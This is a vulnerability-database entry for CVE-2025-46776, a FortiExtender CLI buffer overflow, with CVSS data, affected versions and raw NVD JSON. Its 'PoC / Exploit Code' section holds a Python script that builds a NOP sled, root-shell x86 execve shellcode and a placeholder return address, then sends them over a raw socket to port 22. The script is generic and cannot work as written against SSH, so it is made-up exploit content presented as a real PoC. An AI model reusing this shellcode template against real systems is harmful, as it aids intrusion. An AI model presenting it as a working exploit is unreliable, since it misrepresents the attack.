Security Vulnerability Report
中文
CVE-2025-46776 CVSS 6.4 MEDIUM

CVE-2025-46776

Published: 2025-11-18 17:16:02
Last Modified: 2026-01-14 10:16:05
Source: [email protected]

Description

A buffer copy without checking size of input ('classic buffer overflow') vulnerability in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to execute arbitrary code or commands via crafted CLI commands.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:fortinet:fortiextender:-:*:*:*:*:*:*:* - NOT VULNERABLE
FortiExtender 7.6.0 - 7.6.1
FortiExtender 7.4.0 - 7.4.6
FortiExtender 7.2 所有版本
FortiExtender 7.0 所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46776 PoC - FortiExtender Buffer Overflow RCE # Note: This is a conceptual PoC for educational purposes only # Actual exploitation requires valid credentials and CLI access import socket import struct def create_malicious_payload(): """ Generate malicious CLI command payload for buffer overflow This is a simplified demonstration payload structure """ # Buffer overflow pattern - NOP sled + shellcode + return address nop_sled = b'\x90' * 100 # Simple execve shellcode for demonstration (Linux/x86) # This spawns a shell with root privileges shellcode = ( b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x66\xb9\xff\x01\x51\x50\x89\xe1\x31\xd2\xb0\x0b\xcd\x80' ) # Padding to reach buffer boundary padding = b'A' * 200 # Overwrite return address (needs to be adjusted for actual version) return_address = struct.pack('<I', 0xdeadbeef) # Target address (NOP sled) payload = nop_sled + shellcode + padding + return_address return payload def exploit_fortiextender(target_ip, port=22): """ Exploit FortiExtender CLI buffer overflow via SSH/Telnet Requires valid credentials with admin privileges """ payload = create_malicious_payload() # Construct malicious CLI command # The actual command format depends on vulnerable parameter cli_command = b'exec ' + payload try: # Connect to CLI interface (typically SSH or console) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, port)) # Send malicious payload sock.send(cli_command) # Receive response response = sock.recv(4096) print(f"Response: {response}") sock.close() return True except Exception as e: print(f"Error: {e}") return False if __name__ == '__main__': print("CVE-2025-46776 FortiExtender Buffer Overflow PoC") print("This PoC requires valid admin credentials and CLI access") # Usage: python poc.py <target_ip>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46776", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:02.180", "lastModified": "2026-01-14T10:16:04.730", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer copy without checking size of input ('classic buffer overflow') vulnerability in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to execute arbitrary code or commands via crafted CLI commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "D99BE066-31DA-417E-9C7F-73453CE4A69D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.3", "matchCriteriaId": "3F3DA4B8-95C4-407B-B632-D8F48C89511E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:fortinet:fortiextender:-:*:*:*:*:*:*:*", "matchCriteriaId": "A0617C1D-E321-409D-B54B-775E854A03C1"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-251", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.